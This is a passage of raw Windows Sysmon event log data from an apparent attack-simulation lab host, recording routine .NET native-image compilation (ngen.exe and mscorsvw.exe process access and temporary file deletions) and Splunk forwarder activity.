21:07:23.076{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A28B-60D3-0106-00000000CF01}2212C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023921Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:23.061{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A28B-60D3-0106-00000000CF01}2212C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023920Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:23.061{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A28B-60D3-0106-00000000CF01}2212C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023919Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:23.061{4DB9351A-A28B-60D3-0006-00000000CF01}7112NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\MD83RQ88MI\System.Windows.Forms.DataVisualization.Design.ni.dll.auxMD5=93C12909F584D53119CA32A6202DC490,SHA256=43609F3AE6C13B06B99C7B1A313BC612743960254B56314B344A32E8B225816A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023918Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:23.061{4DB9351A-A28B-60D3-0006-00000000CF01}7112NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\MD83RQ88MI\System.Windows.Forms.DataVisualization.Design.ni.dllMD5=B56B4EF7630997E716A389EEE6585CDA,SHA256=696883C484C20E8CDCC0FDB834D76F7171D9AA27E4E75AA456AA117603AFE08A,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023917Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:23.045{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A28B-60D3-0006-00000000CF01}7112C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023916Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:23.030{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A28B-60D3-0006-00000000CF01}7112C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023915Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:23.030{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A28B-60D3-0006-00000000CF01}7112C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023914Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:23.014{4DB9351A-A28A-60D3-FF05-00000000CF01}6520NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\RB5YXBGRKI\System.Windows.Forms.DataVisualization.ni.dll.auxMD5=B98BD37E01E50B4A1AFD69C7419D677D,SHA256=74E72DCCB9FD507506DDE14928D43B6E2DC68DC36A5F6F7966BEB030C5507A95,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023913Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:23.014{4DB9351A-A28A-60D3-FF05-00000000CF01}6520NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\RB5YXBGRKI\System.Windows.Forms.DataVisualization.ni.dllMD5=08343E8B56EB895190DAF0379390078E,SHA256=954C29C400388D8441E2A5C73269E1D005F2DE41AB7C2703AE6B2A9D4C73059C,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000024015Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:24.873{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9C2D620DB90E0643AEE0782D104B7A15,SHA256=D06E6DC240DCC1EC0585F1FB4F8ADE469EDE3B4D4612AB45C5834CAF931E6B60,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000024014Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:24.545{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A28C-60D3-1206-00000000CF01}3992C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024013Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:24.530{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A28C-60D3-1206-00000000CF01}3992C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000024012Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:24.530{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A28C-60D3-1206-00000000CF01}3992C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000024011Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:24.530{4DB9351A-A28C-60D3-1106-00000000CF01}3604NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\S8P86B6WJ6\XamlBuildTask.ni.dll.auxMD5=2D317FFCF9EBA75D0002ED17BCDDAFBE,SHA256=B4D919EF33C05E08486CD88A8C3988D62E0AE87B138E1FBC4A3AF67EE5FF3B29,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024010Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:24.530{4DB9351A-A28C-60D3-1106-00000000CF01}3604NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\S8P86B6WJ6\XamlBuildTask.ni.dllMD5=698D68C9CCB6243ADF41092F74520901,SHA256=5AAB81004CA3364F268EC7820B36DEC33506893B8E805CECD1A3B31764A3085C,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000024009Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:24.514{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A28C-60D3-1106-00000000CF01}3604C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024008Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:24.498{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A28C-60D3-1106-00000000CF01}3604C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000024007Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:24.498{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A28C-60D3-1106-00000000CF01}3604C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000024006Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:24.483{4DB9351A-A28C-60D3-1006-00000000CF01}7052NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\FVE81HWJMC\WsatConfig.ni.exe.auxMD5=1F3029C4D1D06D07E39C9196F214F56F,SHA256=9E607BB2EF8693B86E52F6100E93C6ABD5C44AB4FCC0AA552A3D5240B6F9D3EC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024005Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:24.483{4DB9351A-A28C-60D3-1006-00000000CF01}7052NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\FVE81HWJMC\WsatConfig.ni.exeMD5=8D5803E3A60D1D9C1720056CD0BF69D0,SHA256=6432CAB70AC83A6A03D95B0C5FB43B8F98E3AA469BA21DF585D53BA4EB0F14CF,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000024004Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:24.467{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A28C-60D3-1006-00000000CF01}7052C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024003Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:24.451{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A28C-60D3-1006-00000000CF01}7052C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000024002Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:24.451{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A28C-60D3-1006-00000000CF01}7052C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000024001Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:24.451{4DB9351A-A28C-60D3-0F06-00000000CF01}4768NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\PWGW1Z87I0\WindowsFormsIntegration.ni.dll.auxMD5=EB52956B81E1C59C66A8DAAF5C77AEE3,SHA256=99F37AFA49409563145F2BC8BD5F672F3D8F39041A9029ED6E3AD60A1B2D42FC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024000Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:24.451{4DB9351A-A28C-60D3-0F06-00000000CF01}4768NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\PWGW1Z87I0\WindowsFormsIntegration.ni.dllMD5=3257046CB5C1FCE7CE0E1CDCEA06C11D,SHA256=08C3E1EAB2A32576BC86E32B4B4761ABA46489C22F4014426E3A2B00672C013E,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023999Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:24.420{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A28C-60D3-0F06-00000000CF01}4768C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023998Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:24.405{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A28C-60D3-0F06-00000000CF01}4768C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023997Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:24.405{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A28C-60D3-0F06-00000000CF01}4768C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023996Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:24.405{4DB9351A-A28C-60D3-0E06-00000000CF01}1112NT 